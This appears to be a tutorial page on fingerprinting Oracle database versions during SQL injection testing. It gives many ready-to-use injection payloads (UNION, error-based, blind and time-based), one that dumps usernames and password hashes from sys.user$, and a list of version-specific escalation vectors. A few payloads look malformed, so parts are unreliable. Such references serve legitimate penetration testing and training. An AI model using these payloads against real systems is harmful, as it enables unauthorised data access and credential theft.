Testing Version

Methods to determine the version of Oracle database

Basics Last updated: March 14, 2025
versionenumerationreconnaissance

Testing Version

Identifying the Oracle database version is a crucial first step in SQL injection testing. Different Oracle versions have different features, vulnerabilities, and syntax support, which can significantly impact your testing strategy.

Version Information Queries

Oracle provides several ways to retrieve version information:

MethodDescriptionExample Output
SELECT BANNER FROM v$versionFull version stringOracle Database 19c Enterprise Edition Release 19.0.0.0.0 - Production
SELECT VERSION FROM v$instanceShort version number19.0.0.0.0
SELECT * FROM v$versionComplete version detailsMultiple rows with component details
SELECT BANNER_FULL FROM v$versionFull version with patches (12c+)Oracle Database 19c Enterprise Edition Release 19.9.0.0.0 - Production Version 19.9.0.0.0

Basic Version Queries

-- Most common method
SELECT BANNER FROM v$version WHERE ROWNUM=1

-- Alternative method
SELECT VERSION FROM v$instance

-- Multiple information at once
SELECT BANNER, VERSION, VERSION_FULL, VERSION_LEGACY FROM v$instance

Component Version Information

-- Get product component versions
SELECT * FROM product_component_version

-- Get feature usage info (needs higher privileges)
SELECT * FROM dba_feature_usage_statistics

SQL Injection Examples

UNION-Based Version Detection

-- Basic UNION attack
' UNION SELECT BANNER,NULL FROM v$version WHERE ROWNUM=1--

-- Multi-column output
' UNION SELECT NULL,BANNER,NULL,NULL FROM v$version--

Error-Based Version Detection

-- Using error messages to extract version
' AND (SELECT UPPER(BANNER) FROM v$version WHERE ROWNUM=1)='ORACLE'--

-- Forcing error with version info
' AND CTXSYS.DRITHSX.SN(1,(SELECT BANNER FROM v$version WHERE ROWNUM=1))=1--

Blind Version Detection

For blind SQL injection scenarios, character-by-character extraction:

-- Check if first character of version is 'O'
' AND ASCII(SUBSTR((SELECT BANNER FROM v$version WHERE ROWNUM=1),1,1))=79--

For time-based blind:

-- Add delay if first character is 'O'
' AND (CASE WHEN ASCII(SUBSTR((SELECT BANNER FROM v$version WHERE ROWNUM=1),1,1))=79 THEN dbms_pipe.receive_message('x',10) ELSE NULL END) IS NULL--

Version-Specific Testing

Different Oracle versions have different vulnerabilities and features:

Oracle 8i (8.1.7) and Earlier

-- Check for Oracle 8
' AND TO_NUMBER(SUBSTR(BANNER,INSTR(BANNER,' ')+1,1))=8--

-- Oracle 8-specific system tables
' UNION SELECT username,password FROM sys.user$--

Oracle 9i (9.0.1 - 9.2.0)

-- Check for Oracle 9i
' AND INSTR(BANNER,'9i')>0--

-- Oracle 9i features
' AND (SELECT COUNT(*) FROM all_registry_banners WHERE BANNER LIKE '%9i%')>0--

Oracle 10g (10.1 - 10.2)

-- Check for Oracle 10g
' AND INSTR(BANNER,'10g')>0--

-- Oracle 10g specific views
' UNION SELECT column_name,NULL FROM all_tab_columns WHERE table_name='SCHEDULER$_JOB'--

Oracle 11g (11.1 - 11.2)

-- Check for Oracle 11g
' AND INSTR(BANNER,'11g')>0--

-- Oracle 11g specific feature (case-sensitive passwords)
' AND (SELECT COUNT(*) FROM v$parameter WHERE name='sec_case_sensitive_logon')>0--

Oracle 12c (12.1 - 12.2)

-- Check for Oracle 12c
' AND INSTR(BANNER,'12c')>0--

-- Check for pluggable database feature (12c+)
' AND (SELECT COUNT(*) FROM v$pdbs)>0--

Oracle 18c/19c/21c

-- Check for Oracle 19c
' AND INSTR(BANNER,'19c')>0--

-- Check for newer features
' AND (SELECT COUNT(*) FROM v$option WHERE parameter='Autonomous Database')>0--

Oracle Edition Detection

Oracle comes in different editions (Enterprise, Standard, Express):

-- Checking for Enterprise Edition
' AND INSTR(BANNER,'Enterprise')>0--

-- Checking for Express Edition
' AND INSTR(BANNER,'Express')>0--

PL/SQL Version Detection

PL/SQL version might differ from database version:

-- Get PL/SQL version
' UNION SELECT comp_name,version FROM dba_registry WHERE comp_id='CATALOG'--

Oracle Application Server Detection

-- Check for Oracle Application Server
' UNION SELECT comp_name,version FROM dba_registry WHERE comp_id='APEX'--

Practical Considerations

Version-based Attack Planning

Once you know the version, you can plan more targeted attacks:

VersionPotential Vectors
8i, 9iOlder PL/SQL package vulnerabilities
10gPL/SQL injection, SYS.DBMS_EXPORT_EXTENSION
11gDBMS_JVM_EXP_PERMS privilege escalation
12c+More restrictive by default, need targeted approaches

Detection Accuracy

Some environments might hide version information:

-- Check if version is being masked
' AND (SELECT COUNT(*) FROM v$version WHERE BANNER LIKE '%Production%')>0--
Back to Knowledge Base